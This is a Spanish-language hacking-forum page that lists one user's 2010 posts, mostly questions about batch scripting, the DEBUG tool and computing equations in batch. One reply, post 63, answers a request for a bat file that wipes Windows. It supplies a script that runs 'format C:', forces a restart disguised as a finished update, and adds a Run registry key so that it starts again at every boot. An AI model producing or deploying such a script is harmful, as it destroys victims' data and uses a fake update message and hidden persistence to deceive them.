elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8
61  Programación / Scripting / DEBUG (BATCH) en: 19 Julio 2010, 12:05 pm
Hola, llevo ya tiempo con batch y quiero dar el siguiente paso: controlar el de debug. Aunque no es puramente MS-DOS, lo necesito para hacer juegos, manejar el ratón y crear comandos de colores y coordenadas. El problema es que no encuentro por ningún lado un tutorial decente, apenas explica un esbozo de qué hace cada letra. Lo que os pido chicos, es que me enseñéis a manejarlo completamente, que me expliquéis que hace por ejemplo E 0160, que explican qué es E, pero de hexadecimales no explican anda. Y como sois todos unos expertos estoy seguro de que podréis ayduarme, muchas gracias

PD: Quiero especializarme en BATCH primero, ¿de acuerdo? Phyton y Perl los aprenderé mas adelante.
62  Programación / Scripting / Re: Globos de ayuda en: 16 Julio 2010, 16:23 pm
Debug es una aplicación adjunta de MS DOS que permite editar la memoria bit a bit. Es posible hacer cualquier cosa con él y es posible que el globo de texto esté dentro de sus posibilidades. Pero sin duda es más facil con Visual Basic.
63  Programación / Scripting / Re: crear un bat k formatee windows en uso o borre algun archivo importante dll.. en: 14 Julio 2010, 19:07 pm
Sería algo como

@echo off
AT XX:XX shutdown -r -f -q -c La actualizaci¢n ha finalizado correctamente, es preciso reiniciar el equipo
format C:/>nul
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sysin2 /t REG_SZ /d "c:/windows/system32/windosx.bat"

Espero que te funcione
64  Programación / Scripting / Re: Globos de ayuda en: 14 Julio 2010, 18:48 pm
En batch estoy seguro de que no se puede hacer, en todo caso...con algunos comandos y un debug. Pero seguro que se puede hacer en VB, es ideal para controlar la apariencia de la pantalla
65  Programación / Scripting / Re: Ecuaciones (BATCH) en: 12 Julio 2010, 18:43 pm
Gracias, ese código ya lo tengo, el problema estaba, más bien, en el tema de los números negativos y tal. Y lo de calcular con variables de cadena (4x por ejemplo)
si me podéis ayudar...
66  Programación / Scripting / Re: Ecuaciones (BATCH) en: 12 Julio 2010, 11:47 am
Mmm ya...pues es una faena. Bueno, de momento pues me conformo con saber cómo hacer para calcularlas aunque los números sean correctos, me basta con saber que soy capaz de hacer lo que me propongo, de modo que voy a reservar BATCH para base, me interesa saber cómo hacer eso de las ecuaciones de 2º grado, identidades notables y de doble incógnita, después ya solo necesito aprender más como por ejemplo lo del debug, el ratón en batch y cosas así. Después me iniciaré en C.

¿ Podéis ayudarme a sacar esas cosas de las ecuaciones? Gracias.
67  Programación / Scripting / Re: Ecuaciones (BATCH) en: 8 Julio 2010, 18:23 pm
Lo había pensado y tal pero ese no es exactamente el problema.

Lo que quiero hacer es que me de el resultado 11,04

entonces lo que yo hago es

11040/1000 -->  11
11*1000 -->11000
11040-11000--->>40  y tendría que darme  040 para así poder hacer

%11% , %040%

pero las que no llevan un 0 delante como por ejemplo 11.500 (11.5) no necesito poner el 0 delante. ¿Cómo lo hago?

Y POR CIERTO

tengo un problema gordo chicos, necesito que me ayudéis un poco.

al hacer  2500*3500*31416 me da 12093056, y el resultado real es 274890000000

¿Por qué pasa esto? me hace, junto con lo de arriba, que todo tenga posibilidad de fallo. Ayudadme por favor.
68  Programación / Scripting / Re: Ecuaciones (BATCH) en: 7 Julio 2010, 12:13 pm
Gracias, aunque eso me lleva a preguntar, ya que mencionas que los ceros se omiten....¿cómo hago para que reste con un cero delante?

Lo que quiero hacer es que al restar 11040 - 11000 me de 040, y no 40. Es para unos decimales, si puede ser.

Ahora estoy de vacaciones pero me llevo el portátil, solo tengo Internet durante unas horas, voy a ir programando pero, por si no lo he dicho antes, esto es para una calculadora científica y completa y ahora estoy con el apartado de geometría. Si me surge alguna duda, ya os la preguntaré...Cuando termine el apartado, que me va a costar porque es muy completo, ya me pondré con ecuaciones. Pero gracias por vuestros códigos, estoy seguro de que me será útil ese último de separar variables.
69  Programación / Scripting / Re: Ecuaciones (BATCH) en: 30 Junio 2010, 15:46 pm
No he entendido nada jeje...¿Podríais explicármelo mejor? Y lo de las identidades notables ¿cómo hago para diferenciar si tiene x y exponente? se pueden usar filtros con los if (*,?)como hago para separar tres dígitos en variables?

Eso me vendrá también muy bien para lo de las ecuaciones de 2º grado.
70  Programación / Scripting / Re: Ecuaciones (BATCH) en: 30 Junio 2010, 00:28 am
Gracias por el código, me vendrá muy bien.

En cuanto a las ecuaciones de segundo grado de tipo 3, yo se hacer perfectamente la raíz cuadrada, el problema es principalmente lo de los números negativos, que cambia de signo y todo eso. Ahí está la dificultad, ¿alguien me ayuda? no puedo pedir que ingresen el número con el signo porque si no, la variable no es numérica y no puedo sumarla.

Y también he preguntado sobre como hacer identidades notables. Pero muchas gracias por los códigos,me estáis ayudando bastante.
Páginas: 1 2 3 4 5 6 [7] 8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines